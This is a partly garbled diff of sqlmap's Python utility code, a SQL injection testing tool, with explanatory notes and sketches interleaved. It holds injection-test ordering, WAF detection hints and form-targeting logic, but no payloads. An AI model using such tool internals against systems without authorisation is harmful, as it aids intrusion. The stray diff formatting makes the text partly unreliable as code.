elif prefix is None:
|
||||||
page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
|
page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
|
||||||
elif suffix is None:
|
elif suffix is None:
|
||||||
page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
|
page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
|
||||||
else:
|
else:
|
||||||
page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
|
page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
|
||||||
|
|
||||||
return page
|
return page
|
||||||
|
|
||||||
|
@@ -2568,7 +2677,7 @@ def parseSqliteTableSchema(value):
     table = {}
     columns = {}

-    for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
+    for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
         columns[match.group(1)] = match.group(2)

     table[conf.tbl] = columns
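The widened type list means column definitions using any of the common SQLite type names (VARCHAR, BLOB, DATETIME and so on), not just the five storage classes, are now picked up from the CREATE TABLE statement. A small demonstration of the same idea with a trimmed-down type alternation:

    import re

    # trimmed-down version of the type alternation used above
    SQLITE_TYPES = r"(\w+)\s+(INTEGER|TEXT|VARCHAR|BLOB|REAL|NUMERIC|DATETIME|BOOLEAN)\b"

    create_stmt = "CREATE TABLE users(id INTEGER PRIMARY KEY, name VARCHAR(32), created DATETIME)"
    columns = dict(re.findall(SQLITE_TYPES, create_stmt, re.I))
    print(columns)  # {'id': 'INTEGER', 'name': 'VARCHAR', 'created': 'DATETIME'}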
@ -2733,14 +2842,14 @@ def getSortedInjectionTests():
|
||||||
retVal = SORT_ORDER.LAST
|
retVal = SORT_ORDER.LAST
|
||||||
|
|
||||||
elif 'details' in test and 'dbms' in test.details:
|
elif 'details' in test and 'dbms' in test.details:
|
||||||
if test.details.dbms in Backend.getErrorParsedDBMSes():
|
if intersect(test.details.dbms, Backend.getIdentifiedDbms()):
|
||||||
retVal = SORT_ORDER.SECOND
|
retVal = SORT_ORDER.SECOND
|
||||||
else:
|
else:
|
||||||
retVal = SORT_ORDER.THIRD
|
retVal = SORT_ORDER.THIRD
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
if Backend.getErrorParsedDBMSes():
|
if Backend.getIdentifiedDbms():
|
||||||
retVal = sorted(retVal, key=priorityFunction)
|
retVal = sorted(retVal, key=priorityFunction)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -2772,20 +2881,24 @@ def showHttpErrorCodes():
|
||||||
if code in httplib.responses else '?', count) \
|
if code in httplib.responses else '?', count) \
|
||||||
for code, count in kb.httpErrorCodes.items())
|
for code, count in kb.httpErrorCodes.items())
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
|
||||||
|
msg = "too many 4xx and/or 5xx HTTP error codes "
|
||||||
|
msg += "could mean that some kind of protection is involved (e.g. WAF)"
|
||||||
|
logger.debug(msg)
|
||||||
|
|
||||||
def openFile(filename, mode='r'):
|
def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
|
||||||
"""
|
"""
|
||||||
Returns file handle of a given filename
|
Returns file handle of a given filename
|
||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
|
return codecs.open(filename, mode, encoding, errors, buffering)
|
||||||
except IOError:
|
except IOError:
|
||||||
errMsg = "there has been a file opening error for filename '%s'. " % filename
|
errMsg = "there has been a file opening error for filename '%s'. " % filename
|
||||||
errMsg += "Please check %s permissions on a file " % ("write" if \
|
errMsg += "Please check %s permissions on a file " % ("write" if \
|
||||||
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
|
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
|
||||||
errMsg += "and that it's not locked by another process."
|
errMsg += "and that it's not locked by another process."
|
||||||
raise SqlmapFilePathException(errMsg)
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
def decodeIntToUnicode(value):
|
def decodeIntToUnicode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -2800,14 +2913,11 @@ def decodeIntToUnicode(value):
|
||||||
|
|
||||||
if isinstance(value, int):
|
if isinstance(value, int):
|
||||||
try:
|
try:
|
||||||
# http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
|
if value > 255:
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
|
|
||||||
_ = "%x" % value
|
_ = "%x" % value
|
||||||
if len(_) % 2 == 1:
|
if len(_) % 2 == 1:
|
||||||
_ = "0%s" % _
|
_ = "0%s" % _
|
||||||
retVal = getUnicode(hexdecode(_))
|
retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
|
||||||
elif value > 255:
|
|
||||||
retVal = unichr(value)
|
|
||||||
else:
|
else:
|
||||||
retVal = getUnicode(chr(value))
|
retVal = getUnicode(chr(value))
|
||||||
except:
|
except:
|
||||||
|
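decodeIntToUnicode() now treats any code point above 255 as a hex-encoded byte string and picks UTF-16 only for Microsoft SQL Server, instead of special-casing MySQL. A rough standalone sketch of that fallback chain; the DBMS check is simulated with a plain argument and the exact encodings chosen here are simplifying assumptions, not sqlmap's behaviour:

    import binascii

    def decode_int(value, mssql=False):
        # values above one byte are re-interpreted from their hex form
        if value > 255:
            hexval = "%x" % value
            if len(hexval) % 2 == 1:
                hexval = "0" + hexval
            raw = binascii.unhexlify(hexval)
            return raw.decode("utf-16-be" if mssql else "utf-8", "replace")
        return chr(value)

    print(decode_int(65))      # 'A'
    print(decode_int(0xC3A9))  # hex C3A9 is the UTF-8 encoding of 'e' with acute accent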
@ -2820,35 +2930,107 @@ def unhandledExceptionMessage():
|
||||||
Returns detailed message about occurred unhandled exception
|
Returns detailed message about occurred unhandled exception
|
||||||
"""
|
"""
|
||||||
|
|
||||||
errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
|
errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
|
||||||
errMsg += "run with the latest development version from the GitHub "
|
errMsg += "run with the latest development version from official GitHub "
|
||||||
errMsg += "repository. If the exception persists, please send by e-mail "
|
errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
|
||||||
errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
|
errMsg += "at '%s' " % ISSUES_PAGE
|
||||||
errMsg += "and any information required to reproduce the bug. The "
|
errMsg += "with the following text and any other information required to "
|
||||||
|
errMsg += "reproduce the bug. The "
|
||||||
errMsg += "developers will try to reproduce the bug, fix it accordingly "
|
errMsg += "developers will try to reproduce the bug, fix it accordingly "
|
||||||
errMsg += "and get back to you.\n"
|
errMsg += "and get back to you\n"
|
||||||
errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
|
errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
|
||||||
errMsg += "Python version: %s\n" % PYVERSION
|
errMsg += "Python version: %s\n" % PYVERSION
|
||||||
errMsg += "Operating system: %s\n" % PLATFORM
|
errMsg += "Operating system: %s\n" % PLATFORM
|
||||||
errMsg += "Command line: %s\n" % " ".join(sys.argv)
|
errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
|
||||||
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
|
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
|
||||||
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
|
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
|
||||||
|
|
||||||
return maskSensitiveData(errMsg)
|
return errMsg
|
||||||
|
|
||||||
|
def createGithubIssue(errMsg, excMsg):
|
||||||
|
"""
|
||||||
|
Automatically create a Github issue with unhandled exception information
|
||||||
|
"""
|
||||||
|
|
||||||
|
issues = []
|
||||||
|
try:
|
||||||
|
issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
finally:
|
||||||
|
issues = set(issues)
|
||||||
|
|
||||||
|
_ = re.sub(r"'[^']+'", "''", excMsg)
|
||||||
|
_ = re.sub(r"\s+line \d+", "", _)
|
||||||
|
_ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
|
||||||
|
_ = re.sub(r".+\Z", "", _)
|
||||||
|
key = hashlib.md5(_).hexdigest()[:8]
|
||||||
|
|
||||||
|
if key in issues:
|
||||||
|
return
|
||||||
|
|
||||||
|
msg = "\ndo you want to automatically create a new (anonymized) issue "
|
||||||
|
msg += "with the unhandled exception information at "
|
||||||
|
msg += "the official Github repository? [y/N] "
|
||||||
|
try:
|
||||||
|
test = readInput(msg, default="N")
|
||||||
|
except:
|
||||||
|
test = None
|
||||||
|
|
||||||
|
if test and test[0] in ("y", "Y"):
|
||||||
|
ex = None
|
||||||
|
errMsg = errMsg[errMsg.find("\n"):]
|
||||||
|
|
||||||
|
|
||||||
|
data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
|
||||||
|
req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")})
|
||||||
|
|
||||||
|
try:
|
||||||
|
f = urllib2.urlopen(req)
|
||||||
|
content = f.read()
|
||||||
|
except Exception, ex:
|
||||||
|
content = None
|
||||||
|
|
||||||
|
issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
|
||||||
|
if issueUrl:
|
||||||
|
infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
try:
|
||||||
|
with open(paths.GITHUB_HISTORY, "a+b") as f:
|
||||||
|
f.write("%s\n" % key)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
warnMsg = "something went wrong while creating a Github issue"
|
||||||
|
if ex:
|
||||||
|
warnMsg += " ('%s')" % ex
|
||||||
|
if "Unauthorized" in warnMsg:
|
||||||
|
warnMsg += ". Please update to the latest revision"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
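The new createGithubIssue() helper anonymizes the traceback (string literals and line numbers stripped, paths reduced to file names), hashes it to an 8-character key, and uses the history file to avoid filing the same issue twice. A hedged sketch of just the deduplication key; the normalization regexes mirror the ones above, while the sample traceback is made up:

    import hashlib
    import re

    def issue_key(exc_msg):
        # normalize the traceback so equivalent crashes hash to the same key
        normalized = re.sub(r"'[^']+'", "''", exc_msg)                      # drop string literals
        normalized = re.sub(r"\s+line \d+", "", normalized)                 # drop line numbers
        normalized = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", normalized)   # keep file names only
        normalized = re.sub(r".+\Z", "", normalized)                        # drop the final message line
        return hashlib.md5(normalized.encode("utf8")).hexdigest()[:8]

    print(issue_key('File "/opt/sqlmap/lib/core/common.py", line 42, in foo\nKeyError: \'x\''))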
def maskSensitiveData(msg):
|
def maskSensitiveData(msg):
|
||||||
"""
|
"""
|
||||||
Masks sensitive data in the supplied message
|
Masks sensitive data in the supplied message
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = msg
|
retVal = getUnicode(msg)
|
||||||
|
|
||||||
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
|
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
|
||||||
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item)
|
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
|
||||||
while extractRegexResult(regex, retVal):
|
while extractRegexResult(regex, retVal):
|
||||||
value = extractRegexResult(regex, retVal)
|
value = extractRegexResult(regex, retVal)
|
||||||
retVal = retVal.replace(value, '*' * len(value))
|
retVal = retVal.replace(value, '*' * len(value))
|
||||||
|
|
||||||
|
if not conf.get("hostname"):
|
||||||
|
match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal)
|
||||||
|
if match:
|
||||||
|
retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
|
||||||
|
|
||||||
|
|
||||||
|
if getpass.getuser():
|
||||||
|
retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def listToStrValue(value):
|
def listToStrValue(value):
|
||||||
|
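maskSensitiveData() now also stars out the target URL when no hostname is set, the local user name, and the values of file-related options, so the text pasted into an automatically created issue leaks as little as possible. A small illustration of the same masking idea (the option list and the regex handling are simplified relative to SENSITIVE_DATA_REGEX):

    import re

    def mask(message, secrets):
        # replace every occurrence of a secret with a same-length run of '*'
        for secret in filter(None, secrets):
            message = re.sub(re.escape(str(secret)), '*' * len(str(secret)), message)
        return message

    print(mask("sqlmap.py -u http://target.tld/page.php?id=1 --user=admin",
               ["target.tld", "admin"]))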
@ -2923,7 +3105,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||||
|
|
||||||
retVal = content
|
retVal = content
|
||||||
|
|
||||||
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
|
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
|
||||||
def _(value):
|
def _(value):
|
||||||
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
|
||||||
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
|
||||||
|
@ -2958,7 +3140,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
|
||||||
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
|
||||||
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
|
||||||
|
|
||||||
if retVal != content and not kb.heuristicMode:
|
if retVal != content:
|
||||||
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
|
||||||
if not suppressWarning:
|
if not suppressWarning:
|
||||||
warnMsg = "reflective value(s) found and filtering out"
|
warnMsg = "reflective value(s) found and filtering out"
|
||||||
|
@ -3108,7 +3290,7 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
pointer = pointer.next[char]
|
pointer = pointer.next[char]
|
||||||
pointer.current.append(option)
|
pointer.current.append(option)
|
||||||
|
|
||||||
for mnemonic in mnemonics.split(','):
|
for mnemonic in (mnemonics or "").split(','):
|
||||||
found = None
|
found = None
|
||||||
name = mnemonic.split('=')[0].replace("-", "").strip()
|
name = mnemonic.split('=')[0].replace("-", "").strip()
|
||||||
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
|
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
|
||||||
|
@ -3134,7 +3316,10 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
if opt.startswith(name):
|
if opt.startswith(name):
|
||||||
options[opt] = option
|
options[opt] = option
|
||||||
|
|
||||||
if name in options:
|
if not options:
|
||||||
|
warnMsg = "mnemonic '%s' can't be resolved" % name
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
elif name in options:
|
||||||
found = name
|
found = name
|
||||||
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
|
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -3144,6 +3329,7 @@ def expandMnemonics(mnemonics, parser, args):
|
||||||
warnMsg += "Resolved to shortest of those ('%s')" % found
|
warnMsg += "Resolved to shortest of those ('%s')" % found
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if found:
|
||||||
found = options[found]
|
found = options[found]
|
||||||
else:
|
else:
|
||||||
found = pointer.current[0]
|
found = pointer.current[0]
|
||||||
|
@ -3212,6 +3398,8 @@ def randomizeParameterValue(value):
|
||||||
|
|
||||||
retVal = value
|
retVal = value
|
||||||
|
|
||||||
|
value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
|
||||||
|
|
||||||
for match in re.finditer('[A-Z]+', value):
|
for match in re.finditer('[A-Z]+', value):
|
||||||
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
|
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
|
||||||
|
|
||||||
|
@ -3251,7 +3439,10 @@ def asciifyUrl(url, forceQuote=False):
|
||||||
return url
|
return url
|
||||||
|
|
||||||
# idna-encode domain
|
# idna-encode domain
|
||||||
|
try:
|
||||||
hostname = parts.hostname.encode("idna")
|
hostname = parts.hostname.encode("idna")
|
||||||
|
except LookupError:
|
||||||
|
hostname = parts.hostname.encode(UNICODE_ENCODING)
|
||||||
|
|
||||||
# UTF8-quote the other parts. We check each part individually if
|
# UTF8-quote the other parts. We check each part individually if
|
||||||
# if needs to be quoted - that should catch some additional user
|
# if needs to be quoted - that should catch some additional user
|
||||||
|
@ -3340,10 +3531,10 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
except UnicodeError:
|
except UnicodeError:
|
||||||
pass
|
pass
|
||||||
except ParseError:
|
except ParseError:
|
||||||
|
if "<html" in (content or ""):
|
||||||
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
|
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
|
||||||
logger.warning(warnMsg)
|
logger.warning(warnMsg)
|
||||||
response.seek(0)
|
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, content)), url)
|
||||||
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
|
|
||||||
try:
|
try:
|
||||||
forms = ParseResponse(filtered, backwards_compat=False)
|
forms = ParseResponse(filtered, backwards_compat=False)
|
||||||
except ParseError:
|
except ParseError:
|
||||||
|
@ -3384,7 +3575,16 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
target = (url, method, data, conf.cookie)
|
# flag to know if we are dealing with the same target host
|
||||||
|
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
||||||
|
|
||||||
|
if conf.scope:
|
||||||
|
if not re.search(conf.scope, url, re.I):
|
||||||
|
continue
|
||||||
|
elif not _:
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
target = (url, method, data, conf.cookie, None)
|
||||||
retVal.add(target)
|
retVal.add(target)
|
||||||
else:
|
else:
|
||||||
errMsg = "there were no forms found at the given target URL"
|
errMsg = "there were no forms found at the given target URL"
|
||||||
|
@ -3395,17 +3595,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||||
|
|
||||||
if addToTargets and retVal:
|
if addToTargets and retVal:
|
||||||
for target in retVal:
|
for target in retVal:
|
||||||
url = target[0]
|
|
||||||
|
|
||||||
# flag to know if we are dealing with the same target host
|
|
||||||
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
|
|
||||||
|
|
||||||
if conf.scope:
|
|
||||||
if not re.search(conf.scope, url, re.I):
|
|
||||||
continue
|
|
||||||
elif not _:
|
|
||||||
continue
|
|
||||||
|
|
||||||
kb.targets.add(target)
|
kb.targets.add(target)
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -3473,7 +3662,7 @@ def evaluateCode(code, variables=None):
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
raise
|
raise
|
||||||
except Exception, ex:
|
except Exception, ex:
|
||||||
errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
|
errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
|
||||||
raise SqlmapGenericException(errMsg)
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
def serializeObject(object_):
|
def serializeObject(object_):
|
||||||
|
@ -3529,7 +3718,7 @@ def applyFunctionRecursively(value, function):
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def decodeHexValue(value):
|
def decodeHexValue(value, raw=False):
|
||||||
"""
|
"""
|
||||||
Returns value decoded from DBMS specific hexadecimal representation
|
Returns value decoded from DBMS specific hexadecimal representation
|
||||||
|
|
||||||
|
@ -3544,7 +3733,7 @@ def decodeHexValue(value):
|
||||||
if value and isinstance(value, basestring) and len(value) % 2 == 0:
|
if value and isinstance(value, basestring) and len(value) % 2 == 0:
|
||||||
retVal = hexdecode(retVal)
|
retVal = hexdecode(retVal)
|
||||||
|
|
||||||
if not kb.binaryField:
|
if not kb.binaryField and not raw:
|
||||||
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
|
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
|
||||||
try:
|
try:
|
||||||
retVal = retVal.decode("utf-16-le")
|
retVal = retVal.decode("utf-16-le")
|
||||||
|
|
|
@ -1,10 +1,11 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
import base64
|
||||||
import json
|
import json
|
||||||
import pickle
|
import pickle
|
||||||
import sys
|
import sys
|
||||||
|
@ -20,7 +21,7 @@ def base64decode(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.decode("base64")
|
return base64.b64decode(value)
|
||||||
|
|
||||||
def base64encode(value):
|
def base64encode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -30,7 +31,7 @@ def base64encode(value):
|
||||||
'Zm9vYmFy'
|
'Zm9vYmFy'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return value.encode("base64")[:-1].replace("\n", "")
|
return base64.b64encode(value)
|
||||||
|
|
||||||
def base64pickle(value):
|
def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
@ -41,6 +42,7 @@ def base64pickle(value):
|
||||||
"""
|
"""
|
||||||
|
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
|
||||||
except:
|
except:
|
||||||
|
@ -63,7 +65,14 @@ def base64unpickle(value):
|
||||||
'foobar'
|
'foobar'
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return pickle.loads(base64decode(value))
|
retVal = None
|
||||||
|
|
||||||
|
try:
|
||||||
|
retVal = pickle.loads(base64decode(value))
|
||||||
|
except TypeError:
|
||||||
|
retVal = pickle.loads(base64decode(bytes(value)))
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
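base64encode()/base64decode() now go through the base64 module directly, and base64unpickle() retries with bytes() when unpickling raises TypeError. A quick usage sketch of the round trip, standard library only (helper names here are illustrative):

    import base64
    import pickle

    def b64pickle(value):
        return base64.b64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))

    def b64unpickle(value):
        try:
            return pickle.loads(base64.b64decode(value))
        except TypeError:
            # e.g. a unicode string on Python 2 - retry with a byte string
            return pickle.loads(base64.b64decode(bytes(value)))

    print(b64unpickle(b64pickle({"dbms": "MySQL", "level": 1})))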
def hexdecode(value):
|
def hexdecode(value):
|
||||||
"""
|
"""
|
||||||
|
@ -137,17 +146,21 @@ def htmlunescape(value):
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def singleTimeWarnMessage(message): # Cross-linked function
|
def singleTimeWarnMessage(message): # Cross-linked function
|
||||||
raise NotImplementedError
|
sys.stdout.write(message)
|
||||||
|
sys.stdout.write("\n")
|
||||||
|
sys.stdout.flush()
|
||||||
|
|
||||||
def stdoutencode(data):
|
def stdoutencode(data):
|
||||||
retVal = None
|
retVal = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
data = data or ""
|
||||||
|
|
||||||
# Reference: http://bugs.python.org/issue1602
|
# Reference: http://bugs.python.org/issue1602
|
||||||
if IS_WIN:
|
if IS_WIN:
|
||||||
output = data.encode("ascii", "replace")
|
output = data.encode(sys.stdout.encoding, "replace")
|
||||||
|
|
||||||
if output != data:
|
if '?' in output and '?' not in data:
|
||||||
warnMsg = "cannot properly display Unicode characters "
|
warnMsg = "cannot properly display Unicode characters "
|
||||||
warnMsg += "inside Windows OS command prompt "
|
warnMsg += "inside Windows OS command prompt "
|
||||||
warnMsg += "(http://bugs.python.org/issue1602). All "
|
warnMsg += "(http://bugs.python.org/issue1602). All "
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -75,7 +75,7 @@ class AttribDict(dict):
|
||||||
for attr in dir(self):
|
for attr in dir(self):
|
||||||
if not attr.startswith('_'):
|
if not attr.startswith('_'):
|
||||||
value = getattr(self, attr)
|
value = getattr(self, attr)
|
||||||
if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
|
||||||
setattr(retVal, attr, copy.deepcopy(value, memo))
|
setattr(retVal, attr, copy.deepcopy(value, memo))
|
||||||
|
|
||||||
for key, value in self.items():
|
for key, value in self.items():
|
||||||
|
|
|
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 

@@ -105,13 +105,22 @@ PGSQL_PRIVS = {
     3: "catupd",
 }
 
+# Reference(s): http://stackoverflow.com/a/17672504
+#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
+
 FIREBIRD_PRIVS = {
     "S": "SELECT",
     "I": "INSERT",
     "U": "UPDATE",
     "D": "DELETE",
-    "R": "REFERENCES",
+    "R": "REFERENCE",
     "E": "EXECUTE",
+    "X": "EXECUTE",
+    "A": "ALL",
+    "M": "MEMBER",
+    "T": "DECRYPT",
+    "E": "ENCRYPT",
+    "B": "SUBSCRIBE",
 }
 
 DB2_PRIVS = {
